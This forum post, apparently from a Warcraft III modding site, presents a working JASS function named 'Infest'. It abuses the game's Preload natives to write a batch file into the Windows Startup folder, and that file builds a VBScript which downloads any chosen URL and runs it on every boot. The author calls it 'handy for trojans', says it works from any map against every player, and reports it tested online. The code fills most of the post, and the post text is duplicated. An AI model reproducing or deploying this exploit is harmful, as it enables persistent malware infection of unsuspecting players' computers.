Jesus4Lyf
Good Idea™
- Reaction score
- 397
Made a post about it here, but hey...
This function is cool. For Windows 7, you must replace YOURUSERNAMEHERE with the username on the computer, but on XP this should be unnecessary (and so XP is particularly vulnerable). Just call the function from WC3. When you next restart your computer, the url you specify will be downloaded to your startup folder as the name you specify, and called (the reason you specify the local filename is so Windows knows what file type to run it as).
If someone could test this online with a friend who has Windows XP and finds it to work, we can successfully say Blizzard needs to patch again. I mean, I'm sure the Russians will love it.
In case someone doesn't understand what this does, calling the function from any map will run the file specified on every player's pc on every boot from then onwards. Very handy for trojans and the like. :thup:
Let me know if this works on XP! I can't test it right now...
Edit: To remove infections, go to Start > Programs > Startup and delete the filename you used as "localname", or "myvirus.bat", depending which is visible.
Edit: Tested on Windows XP, works online, serious threat.
JASS:
function Infest takes string url, string localname returns nothing
call PreloadGenClear()
call PreloadGenStart()
call Preload("\")\necho Set objXMLHTTP = CreateObject(\"MSXML2.XMLHTTP\") > %TEMP%\\download.vbs\n//")
call Preload("\")\necho objXMLHTTP.open \"GET\", \""+url+"\", false >> %TEMP%\\download.vbs\n//")
call Preload("\")\necho objXMLHTTP.send() >> %TEMP%\\download.vbs\n//")
call Preload("\")\necho If objXMLHTTP.Status = 200 Then >> %TEMP%\\download.vbs\n//")
call Preload("\")\necho Set objADOStream = CreateObject(\"ADODB.Stream\") >> %TEMP%\\download.vbs\n//")
call Preload("\")\necho objADOStream.Open >> %TEMP%\\download.vbs\n//")
call Preload("\")\necho objADOStream.Type = 1 >> %TEMP%\\download.vbs\n//")
call Preload("\")\necho objADOStream.Write objXMLHTTP.ResponseBody >> %TEMP%\\download.vbs\n//")
call Preload("\")\necho objADOStream.Position = 0 >> %TEMP%\\download.vbs\n//")
call Preload("\")\necho Set objFSO = Createobject(\"Scripting.FileSystemObject\") >> %TEMP%\\download.vbs\n//")
call Preload("\")\necho If objFSO.Fileexists(\"%APPDATA%\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\"+localname+"\") Then objFSO.DeleteFile \"%APPDATA%\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\"+localname+"\" >> %TEMP%\\download.vbs\n//")
call Preload("\")\necho objADOStream.SaveToFile \"%APPDATA%\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\"+localname+"\" >> %TEMP%\\download.vbs\n//")
call Preload("\")\necho objADOStream.Close >> %TEMP%\\download.vbs\n//")
call Preload("\")\necho End if >> %TEMP%\\download.vbs\n//")
call Preload("\")\necho objFSO.DeleteFile \"%TEMP%\\download.vbs\" >> %TEMP%\\download.vbs\n//")
call Preload("\")\necho objFSO.DeleteFile \"%APPDATA%\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\myvirus.bat\" >> %TEMP%\\download.vbs\n//")
call Preload("\")\nstart %TEMP%\\download.vbs\n//")
call PreloadGenEnd("C:\\Users\\YOURUSERNAMEHERE\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\myvirus.bat")
call PreloadGenClear()
call PreloadGenStart()
call Preload("\")\necho Set objXMLHTTP = CreateObject(\"MSXML2.XMLHTTP\") > %TEMP%\\download.vbs\n//")
call Preload("\")\necho objXMLHTTP.open \"GET\", \""+url+"\", false >> %TEMP%\\download.vbs\n//")
call Preload("\")\necho objXMLHTTP.send() >> %TEMP%\\download.vbs\n//")
call Preload("\")\necho If objXMLHTTP.Status = 200 Then >> %TEMP%\\download.vbs\n//")
call Preload("\")\necho Set objADOStream = CreateObject(\"ADODB.Stream\") >> %TEMP%\\download.vbs\n//")
call Preload("\")\necho objADOStream.Open >> %TEMP%\\download.vbs\n//")
call Preload("\")\necho objADOStream.Type = 1 >> %TEMP%\\download.vbs\n//")
call Preload("\")\necho objADOStream.Write objXMLHTTP.ResponseBody >> %TEMP%\\download.vbs\n//")
call Preload("\")\necho objADOStream.Position = 0 >> %TEMP%\\download.vbs\n//")
call Preload("\")\necho Set objFSO = Createobject(\"Scripting.FileSystemObject\") >> %TEMP%\\download.vbs\n//")
call Preload("\")\necho If objFSO.Fileexists(\"C:\\Documents and Settings\\All Users\\Start Menu\\Programs\\Startup\\"+localname+"\") Then objFSO.DeleteFile \"C:\\Documents and Settings\\All Users\\Start Menu\\Programs\\Startup\\"+localname+"\" >> %TEMP%\\download.vbs\n//")
call Preload("\")\necho objADOStream.SaveToFile \"C:\\Documents and Settings\\All Users\\Start Menu\\Programs\\Startup\\"+localname+"\" >> %TEMP%\\download.vbs\n//")
call Preload("\")\necho objADOStream.Close >> %TEMP%\\download.vbs\n//")
call Preload("\")\necho End if >> %TEMP%\\download.vbs\n//")
call Preload("\")\necho objFSO.DeleteFile \"%TEMP%\\download.vbs\" >> %TEMP%\\download.vbs\n//")
call Preload("\")\necho objFSO.DeleteFile \"C:\\Documents and Settings\\All Users\\Start Menu\\Programs\\Startup\\myvirus.bat\" >> %TEMP%\\download.vbs\n//")
call Preload("\")\nstart %TEMP%\\download.vbs\n//")
call PreloadGenEnd("C:\\Documents and Settings\\All Users\\Start Menu\\Programs\\Startup\\myvirus.bat")
endfunction
//===========================================================================
function InitTrig_Melee_Initialization takes nothing returns nothing
call Infest("http://www.stephan-brenner.com/blog/wp-content/uploads/2008/08/donothing.zip", "myvirus.zip")
endfunction
This function is cool. For Windows 7, you must replace YOURUSERNAMEHERE with the username on the computer, but on XP this should be unnecessary (and so XP is particularly vulnerable). Just call the function from WC3. When you next restart your computer, the url you specify will be downloaded to your startup folder as the name you specify, and called (the reason you specify the local filename is so Windows knows what file type to run it as).
If someone could test this online with a friend who has Windows XP and finds it to work, we can successfully say Blizzard needs to patch again. I mean, I'm sure the Russians will love it.
In case someone doesn't understand what this does, calling the function from any map will run the file specified on every player's pc on every boot from then onwards. Very handy for trojans and the like. :thup:
Let me know if this works on XP! I can't test it right now...
Edit: To remove infections, go to Start > Programs > Startup and delete the filename you used as "localname", or "myvirus.bat", depending which is visible.
Edit: Tested on Windows XP, works online, serious threat.